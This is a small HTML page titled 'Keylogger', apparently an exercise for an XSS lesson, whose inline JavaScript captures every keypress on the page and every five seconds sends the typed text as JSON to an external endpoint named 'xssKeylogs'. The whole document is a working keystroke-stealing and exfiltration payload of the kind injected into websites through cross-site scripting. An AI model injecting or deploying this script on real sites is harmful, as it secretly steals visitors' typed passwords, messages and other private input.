<!DOCTYPE html>
<html lang="de">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<title>Keylogger</title>
</head>

<body>
	<script>
		var word = "", sentence = "", text = "";
        
		document.addEventListener("keypress", function (e) {

			var char_code = event.which || event.keyCode;
			var char_value = String.fromCharCode(char_code)

			console.log(char_code, char_value);

			word += char_value;

			if (char_code == 32) // Space
			{
				console.log("Word", word);
				sentence += word;
				word = "";
			}
			if (char_code == 13 || char_code == 190) // "." or Enter
			{
				console.log("Sentence", sentence);
				text += sentence + word;
				word = "";
				sentence = "";
			}
		});

		setInterval(() => {
			// Check every 5 seconds
			if (text.length > 0) {

				console.log("Text for submission: " + text);
				// Setup xhr request
				var xhr = new XMLHttpRequest();
				xhr.open('POST', 'https://m183.gibz-informatik.ch/api/xssKeylogs');
				xhr.setRequestHeader('Content-Type', 'application/json');
				// Send text
				xhr.send(JSON.stringify({
                        keyword: "XSS Keylogger",
                        payload: text
                    }));

				text = "";
				word = "";
				sentence = "";
			}
		}, 5000);

	</script>
</body>

</html>